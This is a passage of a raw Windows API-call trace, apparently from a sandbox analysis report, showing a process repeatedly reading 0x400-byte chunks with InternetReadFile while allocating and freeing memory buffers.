VirtualFree (lpAddress=0x4b4c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.145] VirtualFree (lpAddress=0x4b34000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.147] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.147] VirtualFree (lpAddress=0x4b48000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.148] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.150] VirtualFree (lpAddress=0x4b50000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.152] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.153] VirtualFree (lpAddress=0x4b64000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.153] VirtualAlloc (lpAddress=0x4b38000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b38000 [0122.156] VirtualFree (lpAddress=0x4b20000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.172] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.173] VirtualAlloc (lpAddress=0x4b50000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b50000 [0122.175] VirtualFree (lpAddress=0x4b34000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.177] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.178] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.182] VirtualFree (lpAddress=0x4b4c000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.184] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.185] VirtualFree (lpAddress=0x4b64000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.187] VirtualAlloc (lpAddress=0x4b38000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b38000 [0122.191] VirtualFree (lpAddress=0x4b20000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.194] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.194] VirtualAlloc (lpAddress=0x4b50000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b50000 [0122.197] VirtualFree (lpAddress=0x4b34000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.198] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.198] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.201] VirtualFree (lpAddress=0x4b4c000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.203] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.203] VirtualAlloc (lpAddress=0x4b38000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b38000 [0122.203] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.204] VirtualFree (lpAddress=0x4b64000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.205] VirtualAlloc (lpAddress=0x4b3c000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b3c000 [0122.207] VirtualFree (lpAddress=0x4b20000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.209] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.209] VirtualAlloc (lpAddress=0x4b58000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b58000 [0122.210] VirtualFree (lpAddress=0x4b54000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.214] VirtualFree (lpAddress=0x4b38000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.215] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.215] VirtualFree (lpAddress=0x4b50000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.215] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.217] VirtualFree (lpAddress=0x4b58000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.219] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.220] VirtualFree (lpAddress=0x4b70000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.220] VirtualAlloc (lpAddress=0x4b3c000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b3c000 [0122.222] VirtualFree (lpAddress=0x4b20000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.225] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.225] VirtualAlloc (lpAddress=0x4b58000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b58000 [0122.226] VirtualFree (lpAddress=0x4b54000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.229] VirtualFree (lpAddress=0x4b38000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.230] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.230] VirtualFree (lpAddress=0x4b50000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.230] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.233] VirtualFree (lpAddress=0x4b58000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.235] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.235] VirtualFree (lpAddress=0x4b70000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.236] VirtualAlloc (lpAddress=0x4b3c000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b3c000 [0122.238] VirtualFree (lpAddress=0x4b20000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.240] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.240] VirtualAlloc (lpAddress=0x4b58000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b58000 [0122.241] VirtualFree (lpAddress=0x4b54000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.244] VirtualFree (lpAddress=0x4b38000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.244] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.245] VirtualFree (lpAddress=0x4b50000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.245] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.248] VirtualFree (lpAddress=0x4b58000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.250] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.250] VirtualFree (lpAddress=0x4b70000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.251] VirtualAlloc (lpAddress=0x4b3c000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b3c000 [0122.254] VirtualFree (lpAddress=0x4b20000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.256] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.256] VirtualAlloc (lpAddress=0x4b58000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b58000 [0122.259] VirtualFree (lpAddress=0x4b38000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.261] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.261] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.263] VirtualFree (lpAddress=0x4b54000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.265] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.265] VirtualFree (lpAddress=0x4b70000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.267] VirtualAlloc (lpAddress=0x4b3c000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b3c000 [0122.269] VirtualFree (lpAddress=0x4b20000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0122.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.270] VirtualAlloc (lpAddress=0x4b58000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b58000 [0122.272] VirtualFree (lpAddress=0x4b38000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.273] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.273] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.276] VirtualFree (lpAddress=0x4b54000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.278] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.278] VirtualAlloc (lpAddress=0x4b3c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b3c000 [0122.278] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.279] VirtualFree (lpAddress=0x4b70000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.281] VirtualAlloc (lpAddress=0x4b40000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0122.282] VirtualFree (lpAddress=0x4b20000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.284] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.285] VirtualAlloc (lpAddress=0x4b60000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b60000 [0122.285] VirtualFree (lpAddress=0x4b5c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.289] VirtualFree (lpAddress=0x4b3c000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.291] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.291] VirtualFree (lpAddress=0x4b58000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.291] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.294] VirtualFree (lpAddress=0x4b60000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.296] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.297] VirtualFree (lpAddress=0x4b7c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.297] VirtualAlloc (lpAddress=0x4b40000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0122.304] VirtualFree (lpAddress=0x4b20000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.307] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.308] VirtualAlloc (lpAddress=0x4b60000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b60000 [0122.309] VirtualFree (lpAddress=0x4b5c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.317] VirtualFree (lpAddress=0x4b3c000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.318] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.319] VirtualFree (lpAddress=0x4b58000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.319] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.322] VirtualFree (lpAddress=0x4b60000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.325] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.325] VirtualFree (lpAddress=0x4b7c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.326] VirtualAlloc (lpAddress=0x4b40000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0122.329] VirtualFree (lpAddress=0x4b20000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.331] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.331] VirtualAlloc (lpAddress=0x4b60000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b60000 [0122.332] VirtualFree (lpAddress=0x4b5c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.336] VirtualFree (lpAddress=0x4b3c000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.337] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.337] VirtualFree (lpAddress=0x4b58000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.338] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.341] VirtualFree (lpAddress=0x4b60000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.343] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.343] VirtualFree (lpAddress=0x4b7c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.343] VirtualAlloc (lpAddress=0x4b40000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0122.382] VirtualFree (lpAddress=0x4b20000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.385] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.385] VirtualAlloc (lpAddress=0x4b60000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b60000 [0122.388] VirtualFree (lpAddress=0x4b3c000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.389] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.390] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.393] VirtualFree (lpAddress=0x4b5c000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.395] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.396] VirtualFree (lpAddress=0x4b7c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.398] VirtualAlloc (lpAddress=0x4b40000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0122.401] VirtualFree (lpAddress=0x4b20000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0122.403] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.403] VirtualAlloc (lpAddress=0x4b60000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b60000 [0122.406] VirtualFree (lpAddress=0x4b3c000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.407] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.410] VirtualFree (lpAddress=0x4b5c000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.412] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.413] VirtualAlloc (lpAddress=0x4b40000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0122.413] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.413] VirtualFree (lpAddress=0x4b7c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.415] VirtualAlloc (lpAddress=0x4b44000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b44000 [0122.421] VirtualFree (lpAddress=0x4b20000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.424] VirtualAlloc (lpAddress=0x4b68000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b68000 [0122.425] VirtualFree (lpAddress=0x4b64000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.428] VirtualFree (lpAddress=0x4b40000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.430] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.430] VirtualFree (lpAddress=0x4b60000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.430] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.434] VirtualFree (lpAddress=0x4b68000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.436] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.437] VirtualFree (lpAddress=0x4b88000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.437] VirtualAlloc (lpAddress=0x4b44000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b44000 [0122.440] VirtualFree (lpAddress=0x4b20000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.443] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.443] VirtualAlloc (lpAddress=0x4b68000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b68000 [0122.444] VirtualFree (lpAddress=0x4b64000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.449] VirtualFree (lpAddress=0x4b40000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.450] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.450] VirtualFree (lpAddress=0x4b60000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.450] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.453] VirtualFree (lpAddress=0x4b68000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.459] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.459] VirtualFree (lpAddress=0x4b88000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.460] VirtualAlloc (lpAddress=0x4b44000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b44000 [0122.464] VirtualFree (lpAddress=0x4b20000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.467] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.467] VirtualAlloc (lpAddress=0x4b68000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b68000 [0122.468] VirtualFree (lpAddress=0x4b64000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.473] VirtualFree (lpAddress=0x4b40000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.474] VirtualFree (lpAddress=0x4b60000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.474] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.478] VirtualFree (lpAddress=0x4b68000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.481] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.481] VirtualFree (lpAddress=0x4b88000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.481] VirtualAlloc (lpAddress=0x4b44000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b44000 [0122.485] VirtualFree (lpAddress=0x4b20000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.487] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.488] VirtualAlloc (lpAddress=0x4b68000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b68000 [0122.504] VirtualFree (lpAddress=0x4b40000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.505] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.505] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.509] VirtualFree (lpAddress=0x4b64000, dwSize=0x24000, 